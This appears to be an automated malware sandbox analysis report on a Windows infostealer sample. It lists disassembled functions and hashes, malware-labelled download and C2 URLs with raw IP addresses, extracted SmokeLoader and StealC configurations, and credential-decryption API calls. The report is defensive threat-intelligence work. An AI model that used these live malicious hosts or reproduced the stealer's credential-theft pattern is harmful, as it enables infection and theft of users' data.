Yara matches

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: 4160a6f1101658ceff0a1bf6d1849b585d2b8c3c9855eb8999164486608791c1
Instruction ID: af9accb6cab7cb833db801529b30dd73882fb9a4e77df48c3dbf557f38ff7f74
Opcode Fuzzy Hash: 4160a6f1101658ceff0a1bf6d1849b585d2b8c3c9855eb8999164486608791c1
Instruction Fuzzy Hash: 29F082350007328B8B359F29B84911EBFADBF733613580915D688CB7D1C770ADA2CAD6

Uniqueness

Uniqueness Score: -1.00%

Function 0044B0B0 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 309COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?), ref: 0044B123

Part of subcall function 0044C230: memset.VCRUNTIME140(?,00000000,00000048), ref: 0044C2C0
Part of subcall function 0044C230: memset.VCRUNTIME140(00000000,00000000,?,?,?,?,00000000,etilqs_), ref: 0044C331

Part of subcall function 0044A4E0: __allrem.LIBCMT ref: 0044A51B

Strings

@OD, xrefs: 0044B162, 0044B379
%s-shm, xrefs: 0044B13A
winOpenShm, xrefs: 0044B2A0

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memset$__allrem
String ID: %s-shm$@OD$winOpenShm
API String ID: 2975316058-2454034155
Opcode ID: 03613a237d762ad0c4844fe22a3ce4fac7e07808c09b8c32b8b4c2728ec5d983
Instruction ID: 773ad978bbbc40b51570ed424c54c1d581833513e3531f25563484faf3f0c067
Opcode Fuzzy Hash: 03613a237d762ad0c4844fe22a3ce4fac7e07808c09b8c32b8b4c2728ec5d983
Instruction Fuzzy Hash: C2B13671A003059BFB108FA1DC55BABBBB4FF54305F14416AEC05AB392EB78D858CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004E1180 Relevance: 6.3, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004D5AA9,?,?,?,?,?,00000001), ref: 004E119D
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004D5AA9,?,?,?,?,?,00000001), ref: 004E11A6
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004D5AA9,?,?,?,?,?,00000001), ref: 004E11AD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004D5AA9,?,?,?,?,?,00000001), ref: 004E11BD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004D5AA9,?,?,?,?,?,00000001), ref: 004E11C4

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c459575d1d53eea66e14db5e2b5b0970f4a1757e1c5554ae7409ba6ddda4b7a8
Instruction ID: a4538732c7f29f8ff8903518afc10a7f1f63f2f6339cf27328c398e29f89e1bd
Opcode Fuzzy Hash: c459575d1d53eea66e14db5e2b5b0970f4a1757e1c5554ae7409ba6ddda4b7a8
Instruction Fuzzy Hash: 94F09A36100200ABCB104F05EC4CA0ABB78FF98323B148215EB1947230E73AA828DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004404E0 Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

?tolower@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000100), ref: 004404FA
?tolower@?$ctype@D@std@@QBEDD@Z.MSVCP140(?), ref: 0044050C
?_Xbad_alloc@std@@YAXXZ.MSVCP140 ref: 004405E6
?_Xbad_alloc@std@@YAXXZ.MSVCP140 ref: 00440620

Part of subcall function 00440700: ?tolower@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000100,?,?,00000100,?,00440598,00000100), ref: 0044071A
Part of subcall function 00440700: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000100,?,?,?,00000100,?,00440598,00000100), ref: 00440759
Part of subcall function 00440700: ?_Xbad_alloc@std@@YAXXZ.MSVCP140 ref: 00440766

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ?tolower@?$ctype@D@std@@Xbad_alloc@std@@$realloc
String ID:
API String ID: 1543586782-0
Opcode ID: ceac8d00d3b7e55be6930adfa6ae56c44a342309d2839e33224c63c1e9c25d01
Instruction ID: 55b626bbe09ec20f8e756962e9744ee79679f5a969035a9b3f201d5a1e71fb53
Opcode Fuzzy Hash: ceac8d00d3b7e55be6930adfa6ae56c44a342309d2839e33224c63c1e9c25d01
Instruction Fuzzy Hash: 2341F371A00701AFD720DF25D48092ABBF1FF98310B11C52EE98A87711D335E961CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004503C0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 306COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004504BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045050E

Part of subcall function 0044D7A0: memset.VCRUNTIME140(?,00000000,?,00000000,?,004510EB,?,?,?,?,?,?,?,?,0044F260,000000FF), ref: 0044D81E

Strings

recovered %d pages from %s, xrefs: 004506E7

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memset
String ID: recovered %d pages from %s
API String ID: 3912115370-1623757624
Opcode ID: edd6e6a8b152550f99a1fde17efc370524f889445e7506ac084da7a638711104
Instruction ID: 1add391c2bc3985b6e77941d146dca3d0f107b37460958e2dd9272a916ea2434
Opcode Fuzzy Hash: edd6e6a8b152550f99a1fde17efc370524f889445e7506ac084da7a638711104
Instruction Fuzzy Hash: 1EB1A175E0021AAFDB15CF68C880AAFB7B1BF48315F04416AED15A7342E738AD59CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 004052A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(unordered_map/set too long,?,?,811C9DC5,3A5313C3,?,?,00000000), ref: 00405335
ceil.API-MS-WIN-CRT-MATH-L1-1-0 ref: 004053E7

Strings

unordered_map/set too long, xrefs: 00405330

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Xlength_error@std@@ceil
String ID: unordered_map/set too long
API String ID: 2778784045-306623848
Opcode ID: e9120d35f7e6780ac1f7743744b3e1e9f761092a6a30b032d14132ee6dd56df8
Instruction ID: 7d0db396760d083d36888f626013d21fec34d5c89c80f8e9e06967d29e24f4fc
Opcode Fuzzy Hash: e9120d35f7e6780ac1f7743744b3e1e9f761092a6a30b032d14132ee6dd56df8
Instruction Fuzzy Hash: A261AE70A04A19DFCB05DF69C880AAEFBF4FF59304F10866AE415BB281D735A991CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004034E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040359C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004035CE

Strings

[HTTPClient][Error] Unable to perform a REST request from '%s' (Error = %d | %s), xrefs: 0040355F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Xbad_function_call@std@@_invalid_parameter_noinfo_noreturn
String ID: [HTTPClient][Error] Unable to perform a REST request from '%s' (Error = %d | %s)
API String ID: 18249463-1568973982
Opcode ID: 3e860c6a9901f7487319c45f17735a9de06d2662f2a01f535f4c65340836ba06
Instruction ID: 54ca97597575cc7ef797edc3b09cf51a7547ca52905ff3d1f26db0b0effb22ed
Opcode Fuzzy Hash: 3e860c6a9901f7487319c45f17735a9de06d2662f2a01f535f4c65340836ba06
Instruction Fuzzy Hash: E3310270600204AFDB14DF64DD89B9ABBB8FF45315F104529E412AB3E1D779AA04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004CD050 Relevance: 5.3, APIs: 4, Instructions: 342COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,0000002C), ref: 004CD1CB
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 004CD2CE
memmove.VCRUNTIME140(?,?,?), ref: 004CD429
memmove.VCRUNTIME140(?,?,00000000,?,?,?), ref: 004CD43C

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$callocfree
String ID:
API String ID: 3441943481-0
Opcode ID: 134da106bcd943a847a3cf2965a0ae2d9d0cb4d2ccd6fd1b71a98dc349066c51
Instruction ID: 63a7ac8f5776a2f56ea3bb1e1fb0d1fd4fb674ca79f045d51d48688bd2220337
Opcode Fuzzy Hash: 134da106bcd943a847a3cf2965a0ae2d9d0cb4d2ccd6fd1b71a98dc349066c51
Instruction Fuzzy Hash: 1FC1DE75A043408FC720DF19C841F6BB7E4BF88314F080A6EF99597291E739E946CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004022D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Curl session is not initialized ! Use InitSession() before.,0000004F,3A5313C3), ref: 0040233C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00402371

Strings

[HTTPClient][Error] Curl session is not initialized ! Use InitSession() before., xrefs: 00402314

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Xbad_function_call@std@@_invalid_parameter_noinfo_noreturnmemmove
String ID: [HTTPClient][Error] Curl session is not initialized ! Use InitSession() before.
API String ID: 2874333414-3192222045
Opcode ID: d8388960491effa0ebd24f3e6d57e4e604539f3a3f5f3fa8c78f2f697ec756ff
Instruction ID: b769d3e7bebd2251bf8c6f2d941e7231b73fea6d7f1545d351984d817a952077
Opcode Fuzzy Hash: d8388960491effa0ebd24f3e6d57e4e604539f3a3f5f3fa8c78f2f697ec756ff
Instruction Fuzzy Hash: 4F31DF719006048BDB14DF78DA49B9EBBF4FB05304F00466EEC06E77C0D77AA9048B64

Uniqueness

Uniqueness Score: -1.00%

Function 004021C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Curl session is already initialized ! Use CleanupSession() to clean the present one.,00000068), ref: 00402236
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040226B

Strings

[HTTPClient][Error] Curl session is already initialized ! Use CleanupSession() to clean the present one., xrefs: 00402209

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Xbad_function_call@std@@_invalid_parameter_noinfo_noreturnmemmove
String ID: [HTTPClient][Error] Curl session is already initialized ! Use CleanupSession() to clean the present one.
API String ID: 2874333414-2189386349
Opcode ID: b4fadaa065569650441820548db3c01f3de5f3e3c584d43bf1adbabd244999eb
Instruction ID: e6759fdf2579a777a5fb098ef4cd450270cca7edece36eb7a7c95000350bbc21
Opcode Fuzzy Hash: b4fadaa065569650441820548db3c01f3de5f3e3c584d43bf1adbabd244999eb
Instruction Fuzzy Hash: 6A31D1316046049FDB04DFA4D988BEEBBB5FF49714F10859EE841A77D0DB75A904CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00478140 Relevance: 5.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,?,?,?,?,?,00000000), ref: 004781EB
memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,?,00000000), ref: 0047823B
memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0047828B
memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047831D

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 671da7e7be15719a98c21343a79132e682419f1b2156bb5fc54ba01296d5a56f
Instruction ID: 35b2ef8561b0a27e4118e650c3bbc8060e8a6ff8c4871c21eccbaa6c1e0af54b
Opcode Fuzzy Hash: 671da7e7be15719a98c21343a79132e682419f1b2156bb5fc54ba01296d5a56f
Instruction Fuzzy Hash: 76915EB1A00606AFDB10CF69C885BAABBF0FF09310F14496EE559D7741EB38E911CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00485130 Relevance: 5.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000), ref: 00485164
memmove.VCRUNTIME140(?,?,?), ref: 0048517B
memmove.VCRUNTIME140(?,?,?), ref: 00485194
memmove.VCRUNTIME140(?,?,?), ref: 004851AB

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$memset
String ID:
API String ID: 3790616698-0
Opcode ID: 2eadd067ca36cc400cd68871d8807955668125fe966c054f39f7ed667a07b7be
Instruction ID: f9e6f138e9fcc8c70ec3135de2be8e636827706e04be0abdaad08106b3937ce1
Opcode Fuzzy Hash: 2eadd067ca36cc400cd68871d8807955668125fe966c054f39f7ed667a07b7be
Instruction Fuzzy Hash: 361123B2901922BBC7009F5AEC419AABB6CFF85310B400026F908C3910E335FA34CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004E21E0 Relevance: 5.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,004D5AD6,?), ref: 004E21FD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004D5AD6,?), ref: 004E2204
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004D5AD6,?), ref: 004E2215
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004D5AD6,?), ref: 004E221C

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: da9b2375027077af246d8de4b7b7da0ebfb2a3e6cacd2010392003d69a507b69
Instruction ID: c8f3e70b5d979c57b87cba99d54f583e723750f7cc9980811c2f9379b6a4adf5
Opcode Fuzzy Hash: da9b2375027077af246d8de4b7b7da0ebfb2a3e6cacd2010392003d69a507b69
Instruction Fuzzy Hash: D6F0A736010300AFCB014F45ED48A47B77CFF94323B544255FB1457321D776B9249B59

Uniqueness

Uniqueness Score: -1.00%

Source: politefrightenpowoa.pw	URL Reputation: Label: malware
Source: politefrightenpowoa.pw	URL Reputation: Label: malware
Source: http://host-host-file8.com/	URL Reputation: Label: malware
Source: http://sumagulituyo.org/	URL Reputation: Label: malware
Source: http://77.91.76.36/f059ec3d7eb90876/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab	Avira URL Cloud: Label: malware
Source: http://77.91.76.36/f059ec3d7eb90876/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://5.42.64.35/syncUpd.exe	Avira URL Cloud: Label: malware
Source: http://77.91.76.36/f059ec3d7eb90876/nss3.dll	Avira URL Cloud: Label: malware
Source: http://5.42.65.125/288c47bbc1871b42239df19ff4df68f076.exe	Avira URL Cloud: Label: malware
Source: http://77.91.76.36/f059ec3d7eb90876/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://ftpvoyager.cc/ftp/index.php	Avira URL Cloud: Label: malware
Source: http://77.91.76.36/f059ec3d7eb90876/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://cream.hitsturbo.com/order/tuc5.exe	Avira URL Cloud: Label: malware
Source: http://77.91.76.36/f059ec3d7eb90876/freebl3.dll	Avira URL Cloud: Label: malware

Source: ftpvoyager.cc	Virustotal: Detection: 17%	Perma Link
Source: cream.hitsturbo.com	Virustotal: Detection: 19%	Perma Link
Source: lightseinsteniki.org	Virustotal: Detection: 20%	Perma Link
Source: liuliuoumumy.org	Virustotal: Detection: 20%	Perma Link
Source: snukerukeutit.org	Virustotal: Detection: 21%	Perma Link
Source: reviveincapablewew.pw	Virustotal: Detection: 13%	Perma Link
Source: onualituyrs.org	Virustotal: Detection: 19%	Perma Link
Source: stualialuyastrelia.net	Virustotal: Detection: 23%	Perma Link
Source: sumagulituyo.org	Virustotal: Detection: 21%	Perma Link
Source: host-host-file8.com	Virustotal: Detection: 19%	Perma Link
Source: host-file-host6.com	Virustotal: Detection: 20%	Perma Link
Source: http://77.91.76.36/f059ec3d7eb90876/softokn3.dll	Virustotal: Detection: 21%	Perma Link
Source: http://77.91.76.36/f059ec3d7eb90876/sqlite3.dll	Virustotal: Detection: 20%	Perma Link
Source: http://77.91.76.36/f059ec3d7eb90876/nss3.dll	Virustotal: Detection: 21%	Perma Link
Source: http://5.42.64.35/syncUpd.exe	Virustotal: Detection: 23%	Perma Link
Source: http://5.42.65.125/288c47bbc1871b42239df19ff4df68f076.exe	Virustotal: Detection: 19%	Perma Link
Source: http://77.91.76.36/f059ec3d7eb90876/vcruntime140.dll	Virustotal: Detection: 21%	Perma Link
Source: http://77.91.76.36/f059ec3d7eb90876/mozglue.dll	Virustotal: Detection: 21%	Perma Link
Source: http://cream.hitsturbo.com/order/tuc5.exe	Virustotal: Detection: 23%	Perma Link
Source: http://77.91.76.36/f059ec3d7eb90876/freebl3.dll	Virustotal: Detection: 21%	Perma Link

Source: C:\ProgramData\Drivers\csrss.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\1C75.dll	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\23F8.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\820.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Roaming\eieeggj	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Roaming\ireeggj	ReversingLabs: Detection: 51%

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004121D9 _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,omp_get_thread_num,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,BCryptOpenAlgorithmProvider,GetLastError,BCryptSetProperty,GetLastError,BCryptGenerateSymmetricKey,GetLastError,malloc,BCryptDecrypt,CryptUnprotectData,memmove,memmove,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z,memset,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ,?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	7_2_004121D9
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004145AF _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,omp_get_thread_num,_invalid_parameter_noinfo_noreturn,BCryptOpenAlgorithmProvider,GetLastError,BCryptSetProperty,GetLastError,BCryptGenerateSymmetricKey,GetLastError,malloc,BCryptDecrypt,CryptUnprotectData,memmove,_errno,strtoll,memmove,_invalid_parameter_noinfo_noreturn,?_Xout_of_range@std@@YAXPBD@Z,?_Xinvalid_argument@std@@YAXPBD@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,memset,	7_2_004145AF
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00411D70 malloc,memset,malloc,memset,memmove,CryptUnprotectData,free,free,free,	7_2_00411D70
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00418E2A _invalid_parameter_noinfo_noreturn,BCryptOpenAlgorithmProvider,GetLastError,BCryptGenerateSymmetricKey,GetLastError,malloc,BCryptDecrypt,memmove,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z,memset,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ,?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	7_2_00418E2A
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_004F29D0 BCryptGenRandom,	7_2_004F29D0
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_023E206E CryptUnprotectData,	7_2_023E206E
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_023E205B CryptUnprotectData,	7_2_023E205B
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_023E2053 CryptUnprotectData,	7_2_023E2053
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_023E2082 CryptUnprotectData,	7_2_023E2082

Source: 00000004.00000002.2280019076.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}
Source: 00000026.00000002.3186779959.00000000022C5000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://77.91.76.36/3886d2276f6914c4.php"}

Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetProcAddress
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: LoadLibraryA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: lstrcatA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: OpenEventA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CreateEventA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CloseHandle
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: Sleep
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: VirtualFree
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetSystemInfo
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: VirtualAlloc
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: HeapAlloc
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetComputerNameA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: lstrcpyA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetProcessHeap
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetCurrentProcess
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: lstrlenA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: ExitProcess
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetSystemTime
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: advapi32.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: gdi32.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: user32.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: crypt32.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: ntdll.dll
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetUserNameA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CreateDCA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: GetDeviceCaps
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: ReleaseDC
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: sscanf
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: VMwareVMware
Source: 38.3.nsn5FE8.tmp.exe.7d0000.0.raw.unpack	String decryptor: HAL9TH
